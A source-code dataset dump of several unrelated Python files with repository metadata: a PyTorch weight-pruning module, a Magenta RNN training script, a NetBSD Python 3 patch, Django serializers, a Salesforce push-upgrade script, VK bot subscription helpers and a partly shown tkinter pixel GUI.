x = torch.sum((torch.flatten(p) == 0).float())
return float(x) / p.numel()
def masking_fn(X, t_sparsity):
"""Default masking function used by the PruningAgent."""
threshold = torch.sort(torch.abs(X).flatten())[0][int(len(X.flatten()) * t_sparsity.get_epoch_sparsity())]
return (torch.abs(X) > threshold).float()
class PruningAgent(nn.Module):
"""This class augments an existing torch module with callbacks and parameter masks."""
def __init__(self, model, strategy=None, apply_mask=False, ignored_params=[]):
"""You need to pass a module and a constant sparsity strategy.
Args:
model (torch.nn.Module): existing torch module
strategy: the sparisty target strategy
apply_mask (boolean): if this is true a mask will get generated and applied on initialization
ignored_params (list): no pruning gets applied onto the element in the list
"""
super(PruningAgent, self).__init__()
self.model = model
# create a list of parameters to prune
_ignored_params = []
for param in ignored_params:
if isinstance(param, nn.Module):
_ignored_params.extend(list(param.parameters()))
elif isinstance(param, nn.parameter.Parameter):
_ignored_params.append(param)
else:
raise Exception('only parameters and modules are supported in argument ignored_params')
self.to_prune = self.__get_parameters_to_prune(_ignored_params)
# Parameter masks
self.mask = {}
self.masking_fn = masking_fn
if strategy:
if not isinstance(strategy, Constant):
raise Exception('Currently only the constant sparsity strategy is supported.')
self.layer_strategies = self.__init_per_layer_sparsity_strategies(strategy)
self.init_parameter_masks(not apply_mask)
self.__wrap_sub_modules()
def init_parameter_masks(self, initialize_ones=True):
"""Initialize parameter masks.
Args:
initialize_ones (boolean): initialize mask values as 1 (no masking)
"""
for p in self.to_prune:
if initialize_ones:
self.mask[p] = torch.ones(p.size())
else:
self.mask[p] = self.masking_fn(p, self.layer_strategies[p])
p.data = p.data * self.mask[p] # apply mask to corresponding parameter
def __wrap_sub_modules(self):
"""Applies pruning functionality to every parameter of the actual model."""
for param in self.to_prune:
param.register_hook(lambda g, p=param: g * self.mask[p])
# param.register_hook(lambda g, p=param: self._update_parameter_mask(p))
# param.register_hook(lambda g, p=param: self.layer_strategies[p].next_epoch())
def _update_parameter_mask(self, p):
"""Update masks for a parameter p."""
self.mask[p] = self.masking_fn(p, self.layer_strategies[p])
def get_parameter_sparsity(self):
"""Get a list of the sparsity percentages of every model parameter."""
return [calc_parameter_sparsity(p) for p in self.model.parameters()]
| 37.692982
| 110
| 0.643938
|
"""This file contains the implementation for basic pruning operations on arbitrary torch modules."""
import torch
import torch.nn as nn
import copy
from condense.optimizer.sparsity_functions import Constant
def calc_parameter_sparsity(p):
    """Return the fraction of exactly-zero entries in a torch parameter.

    Args:
        p: torch parameter (any shape)

    Returns: sparsity percentage (as float) with range [0.0, 1.0]
    """
    zero_count = float(torch.sum((torch.flatten(p) == 0).float()))
    return zero_count / p.numel()
def masking_fn(X, t_sparsity):
    """Default masking function used by the PruningAgent.

    Keeps the weights whose magnitude is strictly above the magnitude
    quantile selected by the strategy's current target sparsity.

    Args:
        X: torch tensor of weights.
        t_sparsity: sparsity strategy object exposing ``get_epoch_sparsity()``,
            which returns the target sparsity as a float in [0.0, 1.0].

    Returns:
        Float tensor with the same shape as ``X``: 1.0 for kept weights,
        0.0 for pruned ones.
    """
    magnitudes = torch.abs(X)
    sorted_magnitudes = torch.sort(magnitudes.flatten())[0]
    # Clamp the quantile index: a target sparsity of 1.0 would otherwise
    # index one past the end of the sorted tensor (IndexError in the
    # original code).  Behavior for sparsity < 1.0 is unchanged.
    index = min(int(magnitudes.numel() * t_sparsity.get_epoch_sparsity()),
                magnitudes.numel() - 1)
    threshold = sorted_magnitudes[index]
    return (magnitudes > threshold).float()
class PruningAgent(nn.Module):
    """This class augments an existing torch module with callbacks and parameter masks."""
    def __init__(self, model, strategy=None, apply_mask=False, ignored_params=[]):
        """You need to pass a module and a constant sparsity strategy.
        Args:
            model (torch.nn.Module): existing torch module
            strategy: the sparsity target strategy (currently only ``Constant``)
            apply_mask (boolean): if this is true a mask will get generated and applied on initialization
            ignored_params (list): no pruning gets applied onto the element in the list
        """
        # NOTE(review): `ignored_params=[]` is a mutable default argument; it
        # is only iterated here (never mutated), so no bug manifests, but a
        # `None` sentinel would be the safer idiom.
        super(PruningAgent, self).__init__()
        self.model = model
        # Normalize ignored_params: expand modules to their parameters and
        # collect plain parameters, rejecting anything else.
        _ignored_params = []
        for param in ignored_params:
            if isinstance(param, nn.Module):
                _ignored_params.extend(list(param.parameters()))
            elif isinstance(param, nn.parameter.Parameter):
                _ignored_params.append(param)
            else:
                raise Exception('only parameters and modules are supported in argument ignored_params')
        self.to_prune = self.__get_parameters_to_prune(_ignored_params)
        # Per-parameter {parameter: mask tensor} mapping (filled below).
        self.mask = {}
        self.masking_fn = masking_fn
        # Per-layer strategies only exist when a strategy is supplied; the
        # masks and gradient hooks are set up unconditionally.
        if strategy:
            if not isinstance(strategy, Constant):
                raise Exception('Currently only the constant sparsity strategy is supported.')
            self.layer_strategies = self.__init_per_layer_sparsity_strategies(strategy)
        self.init_parameter_masks(not apply_mask)
        self.__wrap_sub_modules()
    def __get_parameters_to_prune(self, ignored_params):
        # Keep every model parameter that is not identical (by identity,
        # `is`) to one of the ignored parameters.
        params = []
        for param in self.model.parameters():
            is_ignored = False
            for ignored_param in ignored_params:
                if param is ignored_param:
                    is_ignored = True
                    break
            if not is_ignored:
                params.append(param)
        return params
    def __init_per_layer_sparsity_strategies(self, strategy):
        # Deep-copy the strategy per parameter so each layer tracks its own
        # schedule, seeded with the parameter's current (base) sparsity.
        strat = {}
        for p in self.model.parameters():
            strat[p] = copy.deepcopy(strategy)
            strat[p].set_base_sparsity(calc_parameter_sparsity(p))
        return strat
    def init_parameter_masks(self, initialize_ones=True):
        """Initialize parameter masks.
        Args:
            initialize_ones (boolean): initialize mask values as 1 (no masking)
        """
        for p in self.to_prune:
            if initialize_ones:
                self.mask[p] = torch.ones(p.size())
            else:
                # Requires self.layer_strategies, i.e. a strategy was given.
                self.mask[p] = self.masking_fn(p, self.layer_strategies[p])
            p.data = p.data * self.mask[p] # apply mask to corresponding parameter
    def __wrap_sub_modules(self):
        """Applies pruning functionality to every parameter of the actual model."""
        for param in self.to_prune:
            # Zero the gradients of pruned weights so they stay pruned.
            # `p=param` binds the loop variable early (late-binding closure).
            param.register_hook(lambda g, p=param: g * self.mask[p])
            # param.register_hook(lambda g, p=param: self._update_parameter_mask(p))
            # param.register_hook(lambda g, p=param: self.layer_strategies[p].next_epoch())
    def _update_parameter_mask(self, p):
        """Update masks for a parameter p."""
        self.mask[p] = self.masking_fn(p, self.layer_strategies[p])
    def get_parameter_sparsity(self):
        """Get a list of the sparsity percentages of every model parameter."""
        return [calc_parameter_sparsity(p) for p in self.model.parameters()]
| 610
| 0
| 54
|
15236d3fea42976c8c2bc779f41faee3462af1ff
| 2,715
|
py
|
Python
|
magenta/models/polyphonic_rnn/polyphonic_rnn_train.py
|
jellysquider/magenta
|
0fc8188870f5d1c988b76dae434b21e58362516c
|
[
"Apache-2.0"
] | null | null | null |
magenta/models/polyphonic_rnn/polyphonic_rnn_train.py
|
jellysquider/magenta
|
0fc8188870f5d1c988b76dae434b21e58362516c
|
[
"Apache-2.0"
] | null | null | null |
magenta/models/polyphonic_rnn/polyphonic_rnn_train.py
|
jellysquider/magenta
|
0fc8188870f5d1c988b76dae434b21e58362516c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Train polyphonic RNN."""
import functools
import os
# internal imports
import numpy as np
import tensorflow as tf
from magenta.models.polyphonic_rnn import polyphonic_rnn_graph
from magenta.models.polyphonic_rnn import polyphonic_rnn_lib
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string(
'note_sequence_input', None, 'Polyphonic tfrecord NoteSequence file.')
tf.app.flags.DEFINE_string(
'checkpoint_dir', '/tmp/polyphonic_rnn/checkpoints',
'Path to the directory where checkpoints and summary events will be saved '
'during training')
tf.app.flags.DEFINE_string(
'log', 'INFO',
'The threshold for what messages will be logged DEBUG, INFO, WARN, ERROR, '
'or FATAL.')
if __name__ == '__main__':
console_entry_point()
| 31.206897
| 79
| 0.73186
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Train polyphonic RNN."""
import functools
import os
# internal imports
import numpy as np
import tensorflow as tf
from magenta.models.polyphonic_rnn import polyphonic_rnn_graph
from magenta.models.polyphonic_rnn import polyphonic_rnn_lib
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string(
'note_sequence_input', None, 'Polyphonic tfrecord NoteSequence file.')
tf.app.flags.DEFINE_string(
'checkpoint_dir', '/tmp/polyphonic_rnn/checkpoints',
'Path to the directory where checkpoints and summary events will be saved '
'during training')
tf.app.flags.DEFINE_string(
'log', 'INFO',
'The threshold for what messages will be logged DEBUG, INFO, WARN, ERROR, '
'or FATAL.')
def _loop(graph, itr, sess, inits=None, do_updates=True):
    """Run one step of the polyphonic RNN over the next minibatch.

    Pulls (durations, notes) from ``itr``, feeds shifted input/target pairs
    into the graph with a zeroed initial hidden state, and runs the session.
    When ``do_updates`` is true the optimizer update op is also run.

    Returns:
        (loss, final_hidden_state) for the step.
    """
    initial_hidden = np.zeros((graph.batch_size, graph.rnn_dim)).astype('float32')
    durations, notes = next(itr)
    # Inputs are the sequence minus its last step; targets are shifted by one.
    feed = {
        graph.note_inpt: notes[:-1],
        graph.note_target: notes[1:],
        graph.duration_inpt: durations[:-1],
        graph.duration_target: durations[1:],
        graph.init_h1: initial_hidden,
    }
    fetches = [graph.cost, graph.final_h1]
    if do_updates:
        results = sess.run(fetches + [graph.updates], feed)
        loss, final_hidden = results[0], results[1]
    else:
        loss, final_hidden = sess.run(fetches, feed)
    return loss, final_hidden
def main(unused_argv):
    """Build the training graph from flags and run the training loop.

    Creates the checkpoint directory if needed, constructs the graph from
    the NoteSequence input flag, and hands the per-step `_loop` callable to
    the library's run loop with fixed checkpointing cadence.
    """
    tf.logging.set_verbosity(FLAGS.log)
    checkpoint_dir = os.path.expanduser(FLAGS.checkpoint_dir)
    if not os.path.exists(checkpoint_dir):
        tf.gfile.MakeDirs(checkpoint_dir)
    tf.logging.info('Checkpoint dir: %s', checkpoint_dir)
    graph = polyphonic_rnn_graph.Graph(FLAGS.note_sequence_input)
    # run_loop drives training/validation; _loop is partially applied so the
    # library only supplies (itr, sess, ...) per step.
    polyphonic_rnn_lib.run_loop(
        functools.partial(_loop, graph),
        checkpoint_dir,
        graph.train_itr,
        graph.valid_itr,
        n_epochs=graph.num_epochs,
        checkpoint_delay=40,
        checkpoint_every_n_epochs=5,
        skip_minimums=True)
def console_entry_point():
    """Console-script entry point: delegate flag parsing to tf.app.run."""
    tf.app.run(main)
if __name__ == '__main__':
    console_entry_point()
| 1,287
| 0
| 69
|
78621a8e86299831efb7f131bdc74604edf548df
| 1,297
|
py
|
Python
|
source/pkgsrc/graphics/py-pycha/patches/patch-chavier_gui.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1
|
2021-11-20T22:46:39.000Z
|
2021-11-20T22:46:39.000Z
|
source/pkgsrc/graphics/py-pycha/patches/patch-chavier_gui.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
source/pkgsrc/graphics/py-pycha/patches/patch-chavier_gui.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
$NetBSD: patch-chavier_gui.py,v 1.1 2020/03/11 20:17:12 wiz Exp $
Convert to python3 syntax.
--- chavier/gui.py.orig 2011-08-08 19:23:18.000000000 +0000
+++ chavier/gui.py
- print 'CHART STATE'
- print '-' * 70
- print 'surface: %d x %d' % (alloc.width, alloc.height)
- print 'area :', self.chart.area
- print
- print 'minxval:', self.chart.minxval
- print 'maxxval:', self.chart.maxxval
- print 'xrange :', self.chart.xrange
- print
- print 'minyval:', self.chart.minyval
- print 'maxyval:', self.chart.maxyval
- print 'yrange :', self.chart.yrange
+ print('CHART STATE')
+ print('-' * 70)
+ print('surface: %d x %d' % (alloc.width, alloc.height))
+ print('area :', self.chart.area)
+        print()
+ print('minxval:', self.chart.minxval)
+ print('maxxval:', self.chart.maxxval)
+ print('xrange :', self.chart.xrange)
+ print()
+ print('minyval:', self.chart.minyval)
+ print('maxyval:', self.chart.maxyval)
+ print('yrange :', self.chart.yrange)
| 34.131579
| 65
| 0.573631
|
$NetBSD: patch-chavier_gui.py,v 1.1 2020/03/11 20:17:12 wiz Exp $
Convert to python3 syntax.
--- chavier/gui.py.orig 2011-08-08 19:23:18.000000000 +0000
+++ chavier/gui.py
@@ -523,18 +523,18 @@ class GUI(object):
alloc = self.drawing_area.get_allocation()
- print 'CHART STATE'
- print '-' * 70
- print 'surface: %d x %d' % (alloc.width, alloc.height)
- print 'area :', self.chart.area
- print
- print 'minxval:', self.chart.minxval
- print 'maxxval:', self.chart.maxxval
- print 'xrange :', self.chart.xrange
- print
- print 'minyval:', self.chart.minyval
- print 'maxyval:', self.chart.maxyval
- print 'yrange :', self.chart.yrange
+ print('CHART STATE')
+ print('-' * 70)
+ print('surface: %d x %d' % (alloc.width, alloc.height))
+ print('area :', self.chart.area)
+        print()
+ print('minxval:', self.chart.minxval)
+ print('maxxval:', self.chart.maxxval)
+ print('xrange :', self.chart.xrange)
+ print()
+ print('minyval:', self.chart.minyval)
+ print('maxyval:', self.chart.maxyval)
+ print('yrange :', self.chart.yrange)
def about(self, action=None):
dialog = AboutDialog(self.main_window)
| 56
| 51
| 73
|
36433b1ccbd9a80c18f87b1265e45bc0ae087c57
| 722
|
py
|
Python
|
longclaw/longclaworders/serializers.py
|
Kuntal-KK/longclaw
|
a3493a62937689a15236b2943d19bcf4ec058cd9
|
[
"MIT"
] | 1
|
2021-08-14T13:46:32.000Z
|
2021-08-14T13:46:32.000Z
|
longclaw/longclaworders/serializers.py
|
Kuntal-KK/longclaw
|
a3493a62937689a15236b2943d19bcf4ec058cd9
|
[
"MIT"
] | null | null | null |
longclaw/longclaworders/serializers.py
|
Kuntal-KK/longclaw
|
a3493a62937689a15236b2943d19bcf4ec058cd9
|
[
"MIT"
] | null | null | null |
from rest_framework import serializers
from longclaw.longclaworders.models import Order, OrderItem
from longclaw.longclawproducts.serializers import ProductVariantSerializer
from longclaw.longclawshipping.serializers import AddressSerializer
| 26.740741
| 74
| 0.759003
|
from rest_framework import serializers
from longclaw.longclaworders.models import Order, OrderItem
from longclaw.longclawproducts.serializers import ProductVariantSerializer
from longclaw.longclawshipping.serializers import AddressSerializer
class OrderItemSerializer(serializers.ModelSerializer):
    """Serializes an OrderItem, embedding its full product variant."""
    product = ProductVariantSerializer()
    class Meta:
        model = OrderItem
        fields = "__all__"
class OrderSerializer(serializers.ModelSerializer):
    """Serializes an Order with nested items, shipping address and total."""
    items = OrderItemSerializer(many=True)
    shipping_address = AddressSerializer()
    # Read-only computed field; resolved by get_total below.
    total = serializers.SerializerMethodField()
    class Meta:
        model = Order
        fields = "__all__"
    def get_total(self, obj):
        # Delegates to the model's `total` attribute/property.
        return obj.total
| 29
| 404
| 46
|
36ee0bbc01ea7f98c4fe146f9be1433586cda037
| 1,884
|
py
|
Python
|
ci/push/schedule_push.py
|
marcalbaladejo/CumulusCI
|
f619d0d984f7bbfa3c6fcd6e33e41e64105cb4f5
|
[
"BSD-3-Clause"
] | 1
|
2018-01-31T11:56:03.000Z
|
2018-01-31T11:56:03.000Z
|
ci/push/schedule_push.py
|
marcalbaladejo/CumulusCI
|
f619d0d984f7bbfa3c6fcd6e33e41e64105cb4f5
|
[
"BSD-3-Clause"
] | null | null | null |
ci/push/schedule_push.py
|
marcalbaladejo/CumulusCI
|
f619d0d984f7bbfa3c6fcd6e33e41e64105cb4f5
|
[
"BSD-3-Clause"
] | 1
|
2016-07-20T12:15:38.000Z
|
2016-07-20T12:15:38.000Z
|
import os
import sys
import csv
import time
from push_api import SalesforcePushApi
# Force UTF8 output
reload(sys)
sys.setdefaultencoding('UTF8')
if __name__ == '__main__':
try:
username = os.environ.get('SF_USERNAME')
password = os.environ.get('SF_PASSWORD')
serverurl = os.environ.get('SF_SERVERURL')
version = os.environ.get('VERSION')
subscribers = os.environ.get('SUBSCRIBERS', None)
subscribers_file = os.environ.get('SUBSCRIBERS_FILE', None)
if not subscribers and not subscribers_file:
raise ValueError('You must provide either the SUBSCRIBERS or SUBSCRIBERS_FILE environment variables')
if subscribers:
orgs = subscribers.split(',')
else:
f_orgs = open(subscribers_file, 'r')
orgs = []
for org in f_orgs:
orgs.append(org.strip())
push_api = SalesforcePushApi(username, password, serverurl)
version = push_api.get_package_version_objs("Id = '%s'" % version, limit=1)[0]
print 'Scheduling push upgrade for %s.%s to %s orgs' % (version.major, version.minor, len(orgs))
request_id = push_api.create_push_request(version, orgs)
print 'Push Request %s is populated, setting status to Pending to start execution' % request_id
if len(orgs) > 1000:
print "Delaying 30 seconds to allow all jobs to initialize..."
time.sleep(30)
print push_api.run_push_request(request_id)
print 'Push Request %s is queued for execution' % request_id
except SystemExit:
sys.exit(1)
except:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
print '-'*60
traceback.print_exception(exc_type, exc_value, exc_traceback, file=sys.stdout)
print '-'*60
sys.exit(2)
| 33.642857
| 113
| 0.639597
|
import os
import sys
import csv
import time
from push_api import SalesforcePushApi
# Force UTF8 output (Python 2): avoids UnicodeEncodeError when printing
# non-ASCII data under the default ASCII codec.
reload(sys)
sys.setdefaultencoding('UTF8')
if __name__ == '__main__':
    try:
        # Connection and package-version parameters come from the CI env.
        username = os.environ.get('SF_USERNAME')
        password = os.environ.get('SF_PASSWORD')
        serverurl = os.environ.get('SF_SERVERURL')
        version = os.environ.get('VERSION')
        # Target orgs: either a comma-separated list or a file of org ids,
        # one per line.
        subscribers = os.environ.get('SUBSCRIBERS', None)
        subscribers_file = os.environ.get('SUBSCRIBERS_FILE', None)
        if not subscribers and not subscribers_file:
            raise ValueError('You must provide either the SUBSCRIBERS or SUBSCRIBERS_FILE environment variables')
        if subscribers:
            orgs = subscribers.split(',')
        else:
            # NOTE(review): file handle is never closed; harmless for a
            # short-lived CI script but a `with` block would be cleaner.
            f_orgs = open(subscribers_file, 'r')
            orgs = []
            for org in f_orgs:
                orgs.append(org.strip())
        push_api = SalesforcePushApi(username, password, serverurl)
        # Resolve the version id to its full package-version object.
        version = push_api.get_package_version_objs("Id = '%s'" % version, limit=1)[0]
        print 'Scheduling push upgrade for %s.%s to %s orgs' % (version.major, version.minor, len(orgs))
        request_id = push_api.create_push_request(version, orgs)
        print 'Push Request %s is populated, setting status to Pending to start execution' % request_id
        # Large requests need time for all push jobs to be created server-side
        # before the request is flipped to Pending.
        if len(orgs) > 1000:
            print "Delaying 30 seconds to allow all jobs to initialize..."
            time.sleep(30)
        print push_api.run_push_request(request_id)
        print 'Push Request %s is queued for execution' % request_id
    except SystemExit:
        sys.exit(1)
    except:
        # NOTE(review): bare except is deliberate here -- print a traceback
        # and exit 2 so CI marks the job failed.
        import traceback
        exc_type, exc_value, exc_traceback = sys.exc_info()
        print '-'*60
        traceback.print_exception(exc_type, exc_value, exc_traceback, file=sys.stdout)
        print '-'*60
        sys.exit(2)
| 0
| 0
| 0
|
9e2f6191d670e4988de60e49d379005e81731fb5
| 1,581
|
py
|
Python
|
pskgu_bot/bots/base/user_settings/subscribtion.py
|
mrgick/pskgu_bot
|
a6252c33b3ca18e6df6e79ed9e9721a766ed1e1f
|
[
"MIT"
] | 14
|
2021-02-26T14:33:35.000Z
|
2021-12-27T09:36:12.000Z
|
pskgu_bot/bots/base/user_settings/subscribtion.py
|
mrgick/pskgu_bot
|
a6252c33b3ca18e6df6e79ed9e9721a766ed1e1f
|
[
"MIT"
] | 1
|
2022-02-05T12:37:21.000Z
|
2022-02-05T12:37:24.000Z
|
pskgu_bot/bots/base/user_settings/subscribtion.py
|
mrgick/pskgu_bot
|
a6252c33b3ca18e6df6e79ed9e9721a766ed1e1f
|
[
"MIT"
] | 2
|
2021-03-05T18:07:39.000Z
|
2021-12-03T00:12:29.000Z
|
from ..messages import (MSG_NO_NAME_GROUP, MSG_NOW_UNSUBCRIBE,
MSG_NO_USER_GROUP, msg_not_found_group_name,
msg_already_subscribed, msg_now_subscribed)
from pskgu_bot.db.services import (find_group_by_name, find_vk_user_by_id,
update_user)
from typing import Optional
async def subcribe(user_id: Optional[str] = None,
group_name: Optional[str] = None,
type_sys: str = "vk") -> str:
"""
Подписывает пользователя на группу.
"""
if group_name is None or user_id is None:
return MSG_NO_NAME_GROUP
group = await find_group_by_name(group_name)
if not group:
return msg_not_found_group_name(group_name)
if type_sys == "vk":
user = await find_vk_user_by_id(user_id)
if user:
if user.group == group_name:
return msg_already_subscribed(group_name)
await update_user(user_id, group_name)
return msg_now_subscribed(group_name)
async def unsubcribe(user_id: Optional[str] = None,
type_sys: str = "vk") -> str:
"""
Отписывает пользователя от группы.
"""
if user_id is None:
return MSG_NO_USER_GROUP
if type_sys == "vk":
user = await find_vk_user_by_id(user_id)
if not user:
return MSG_NO_USER_GROUP
else:
if user.group == "":
return MSG_NO_USER_GROUP
else:
await update_user(user_id, "")
return MSG_NOW_UNSUBCRIBE
| 32.265306
| 74
| 0.605313
|
from ..messages import (MSG_NO_NAME_GROUP, MSG_NOW_UNSUBCRIBE,
MSG_NO_USER_GROUP, msg_not_found_group_name,
msg_already_subscribed, msg_now_subscribed)
from pskgu_bot.db.services import (find_group_by_name, find_vk_user_by_id,
update_user)
from typing import Optional
async def subcribe(user_id: Optional[str] = None,
                   group_name: Optional[str] = None,
                   type_sys: str = "vk") -> str:
    """
    Subscribe the user to a group.

    Returns an error message when the user id or group name is missing or
    the group is unknown; otherwise stores the subscription and returns a
    confirmation message.  For ``type_sys == "vk"`` an existing identical
    subscription is reported instead of re-saved.
    """
    if group_name is None or user_id is None:
        return MSG_NO_NAME_GROUP
    group = await find_group_by_name(group_name)
    if not group:
        return msg_not_found_group_name(group_name)
    if type_sys == "vk":
        user = await find_vk_user_by_id(user_id)
        if user:
            if user.group == group_name:
                return msg_already_subscribed(group_name)
    await update_user(user_id, group_name)
    return msg_now_subscribed(group_name)
async def unsubcribe(user_id: Optional[str] = None,
                     type_sys: str = "vk") -> str:
    """
    Unsubscribe the user from their group.

    Clears the stored group for a known "vk" user and returns a confirmation;
    returns an error message when the user id is missing, the user is unknown,
    or there is no subscription.  NOTE(review): for any ``type_sys`` other
    than "vk" this falls through and implicitly returns None -- confirm
    whether other systems are expected here.
    """
    if user_id is None:
        return MSG_NO_USER_GROUP
    if type_sys == "vk":
        user = await find_vk_user_by_id(user_id)
        if not user:
            return MSG_NO_USER_GROUP
        else:
            if user.group == "":
                return MSG_NO_USER_GROUP
            else:
                await update_user(user_id, "")
                return MSG_NOW_UNSUBCRIBE
| 0
| 0
| 0
|
e1f3eb9090ef74e2bd15baffc14d784859c6b703
| 187
|
py
|
Python
|
network/models/random.py
|
matejker/network
|
e2a3f5cb4e351fb682aa1736813cc74bca55c169
|
[
"MIT"
] | 1
|
2020-12-16T18:33:59.000Z
|
2020-12-16T18:33:59.000Z
|
network/models/random.py
|
matejker/network
|
e2a3f5cb4e351fb682aa1736813cc74bca55c169
|
[
"MIT"
] | 4
|
2020-06-17T08:14:23.000Z
|
2020-06-18T22:31:47.000Z
|
network/models/random.py
|
matejker/network
|
e2a3f5cb4e351fb682aa1736813cc74bca55c169
|
[
"MIT"
] | 1
|
2021-05-30T22:55:27.000Z
|
2021-05-30T22:55:27.000Z
|
# from network.models.exceptions import *
# from network.network import Network
# from network.models.tools import random_choice
# from itertools import combinations
# import numpy as np
| 31.166667
| 48
| 0.807487
|
# from network.models.exceptions import *
# from network.network import Network
# from network.models.tools import random_choice
# from itertools import combinations
# import numpy as np
| 0
| 0
| 0
|
105056080a2b5617ca7317b4dea241a923e78797
| 35
|
py
|
Python
|
Tests/Runnable1/r_pyclass_t.py
|
jwilk/Pyrex
|
83dfbae1261788933472e3f9c501ad74c61a37c5
|
[
"Apache-2.0"
] | 5
|
2019-05-26T20:48:36.000Z
|
2021-07-09T01:38:38.000Z
|
Tests/Runnable1/r_pyclass_t.py
|
jwilk/Pyrex
|
83dfbae1261788933472e3f9c501ad74c61a37c5
|
[
"Apache-2.0"
] | null | null | null |
Tests/Runnable1/r_pyclass_t.py
|
jwilk/Pyrex
|
83dfbae1261788933472e3f9c501ad74c61a37c5
|
[
"Apache-2.0"
] | 1
|
2022-02-10T07:14:58.000Z
|
2022-02-10T07:14:58.000Z
|
import r_pyclass
r_pyclass.order()
| 11.666667
| 17
| 0.828571
|
# Smoke test: import the compiled r_pyclass test module and call order(),
# which exercises Pyrex's class-statement execution order.
import r_pyclass
r_pyclass.order()
| 0
| 0
| 0
|
f208c87d20c028b36a883e09891dfc58b7c86336
| 27,334
|
py
|
Python
|
PixelGUI.py
|
ZachJW34/PixelGUI319k
|
f76c5a7bf6909662b609b7c8bf626a94bff980ad
|
[
"MIT"
] | 1
|
2021-07-27T19:12:14.000Z
|
2021-07-27T19:12:14.000Z
|
PixelGUI.py
|
ZachJW34/PixelGUI319k
|
f76c5a7bf6909662b609b7c8bf626a94bff980ad
|
[
"MIT"
] | null | null | null |
PixelGUI.py
|
ZachJW34/PixelGUI319k
|
f76c5a7bf6909662b609b7c8bf626a94bff980ad
|
[
"MIT"
] | null | null | null |
#Developed by Zachary Williams
from tkinter import *
from functools import partial
from PIL import Image
import sys
from sys import platform
root = Tk()
z = mainclass(root)
root.mainloop()
sys.exit()
| 52.870406
| 181
| 0.57412
|
#Developed by Zachary Williams
from tkinter import *
from functools import partial
from PIL import Image
import sys
from sys import platform
class mainclass(object):
colorfillvar = 0
gridwidth = 8
gridheight = 8
griddim = gridwidth * gridheight
colors = []
basecolor = "red"
picname = []
if platform == "linux" or platform == "linux2":
buttonw = 2
buttonh = 2
toolbarw = 370
toolbarh= 10
elif platform == "darwin":
buttonw = 2
buttonh = 2
elif platform == "win32" or "win64":
buttonw = 2
buttonh = 1
toolbarw = 260
toolbarh = 10
COLORS = ['snow', 'ghost white', 'white smoke', 'gainsboro', 'floral white', 'old lace', 'linen', 'antique white',
'papaya whip', 'blanched almond', 'bisque', 'peach puff', 'navajo white', 'lemon chiffon', 'mint cream',
'azure', 'alice blue', 'lavender', 'lavender blush', 'misty rose', 'dark slate gray', 'dim gray',
'slate gray', 'light slate gray', 'gray', 'light grey', 'midnight blue', 'navy', 'cornflower blue',
'dark slate blue', 'slate blue', 'medium slate blue', 'light slate blue', 'medium blue', 'royal blue',
'blue', 'dodger blue', 'deep sky blue', 'sky blue', 'light sky blue', 'steel blue', 'light steel blue',
'light blue', 'powder blue', 'pale turquoise', 'dark turquoise', 'medium turquoise', 'turquoise', 'cyan',
'light cyan', 'cadet blue', 'medium aquamarine', 'aquamarine', 'dark green', 'dark olive green',
'dark sea green', 'sea green', 'medium sea green', 'light sea green', 'pale green', 'spring green',
'lawn green', 'medium spring green', 'green yellow', 'lime green', 'yellow green', 'forest green',
'olive drab', 'dark khaki', 'khaki', 'pale goldenrod', 'light goldenrod yellow', 'light yellow', 'yellow',
'gold', 'light goldenrod', 'goldenrod', 'dark goldenrod', 'rosy brown', 'indian red', 'saddle brown',
'sandy brown', 'dark salmon', 'salmon', 'light salmon', 'orange', 'dark orange', 'coral', 'light coral',
'tomato', 'orange red', 'red', 'hot pink', 'deep pink', 'pink', 'light pink', 'pale violet red', 'maroon',
'medium violet red', 'violet red', 'medium orchid', 'dark orchid', 'dark violet', 'blue violet', 'purple',
'medium purple', 'thistle', 'snow2', 'snow3', 'snow4', 'seashell2', 'seashell3', 'seashell4',
'AntiqueWhite1', 'AntiqueWhite2', 'AntiqueWhite3', 'AntiqueWhite4', 'bisque2', 'bisque3', 'bisque4',
'PeachPuff2', 'PeachPuff3', 'PeachPuff4', 'NavajoWhite2', 'NavajoWhite3', 'NavajoWhite4', 'LemonChiffon2',
'LemonChiffon3', 'LemonChiffon4', 'cornsilk2', 'cornsilk3', 'cornsilk4', 'ivory2', 'ivory3', 'ivory4',
'honeydew2', 'honeydew3', 'honeydew4', 'LavenderBlush2', 'LavenderBlush3', 'LavenderBlush4', 'MistyRose2',
'MistyRose3', 'MistyRose4', 'azure2', 'azure3', 'azure4', 'SlateBlue1', 'SlateBlue2', 'SlateBlue3',
'SlateBlue4', 'RoyalBlue1', 'RoyalBlue2', 'RoyalBlue3', 'RoyalBlue4', 'blue2', 'blue4', 'DodgerBlue2',
'DodgerBlue3', 'DodgerBlue4', 'SteelBlue1', 'SteelBlue2', 'SteelBlue3', 'SteelBlue4', 'DeepSkyBlue2',
'DeepSkyBlue3', 'DeepSkyBlue4', 'SkyBlue1', 'SkyBlue2', 'SkyBlue3', 'SkyBlue4', 'LightSkyBlue1',
'LightSkyBlue2', 'LightSkyBlue3', 'LightSkyBlue4', 'SlateGray1', 'SlateGray2', 'SlateGray3', 'SlateGray4',
